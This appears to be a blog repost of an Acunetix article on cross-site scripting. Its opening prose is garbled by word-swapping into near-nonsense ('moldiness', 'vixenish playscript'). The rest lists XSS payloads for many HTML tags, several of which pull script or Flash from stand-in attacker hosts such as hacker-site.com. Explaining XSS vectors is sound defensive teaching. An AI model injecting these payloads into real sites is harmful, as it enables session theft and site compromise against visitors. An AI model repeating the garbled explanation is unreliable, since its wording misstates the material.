XSS Aggress Vectors
So how does a programmer taint your web tender in the position abode? You strength expect, that for an aggressor to accomplish changes to your web industrialist he moldiness first erupt the section of the web computer and be fit to upload and add files on that server. Unluckily for you an XSS fight is untold easier than that.
Cyberspace applications today are not disturbance HTML pages. They are energizing and filled with ever changing content. Recent web pages draw assemblage from more contrasting sources. This data is blended with your own web industrialist and can take oversimplified text, or images, and can also comprise HTML tags specified as <p> for paragraph, <img> for icon and <script> for scripts. Some present the hacker leave use the 'comments' movie of your web author to position a mention that contains a book. Every individual who views that comment give download the book which module execute on his browser, feat ineligible activity. Something as office on your support can contain a vixenish script, which if not filtered by the Facebook servers leave be injected into your Stratum and finish on the browser of every someone who visits your Facebook profile.
By now you should be knowing that any sort of collection that can inventor on your web page from an extrinsic source has the voltage of state septic with a leering playscript, but in what cast does the aggregation locomote?
<SCRIPT>
The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms:
External script:
<SCRIPT SRC=//hacker-site.com/xss.js></SCRIPT>
Embedded script:
<SCRIPT> alert(“XSS”); </SCRIPT>
<BODY>
The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:
<BODY ONLOAD=alert("XSS")>
The BACKGROUND attribute can be similarly exploited:
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG>
Some browsers will execute a script when found in the <IMG> tag as shown here:
<IMG SRC="javascript:alert('XSS');">
There are some variations of this that work in some browsers:
<IFRAME>
The <IFRAME> tag allows you to import HTML into a page. This important HTML can contain a script.
<IFRAME SRC=”//hacker-site.com/xss.html”>
<INPUT>
If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it can be manipulated to embed a script:
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<LINK>
The <LINK> tag, which is often used to link to external style sheets could contain a script:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<TABLE>
The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image:
<TABLE BACKGROUND="javascript:alert('XSS')">
The same applies to the <TD> tag, used to separate cells inside a table:
<TD BACKGROUND="javascript:alert('XSS')">
<DIV>
The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
The <DIV> STYLE attribute can also be manipulated in the following way:
<DIV STYLE="width: expression(alert('XSS'));">
<OBJECT>
The <OBJECT> tag can be used to pull in a script from an external site in the following way:
<OBJECT TYPE="text/x-scriptlet" DATA="//hacker.com/xss.html">
<EMBED>
If the hacker places a malicious script inside a flash file, it can be injected in the following way:
<EMBED SRC="//hacker.com/xss.swf" AllowScriptAccess="always">
Sumber : http://www.acunetix.com/websitesecurity/cross-site-scripting/
Share This :
comment 0 Comment
more_vert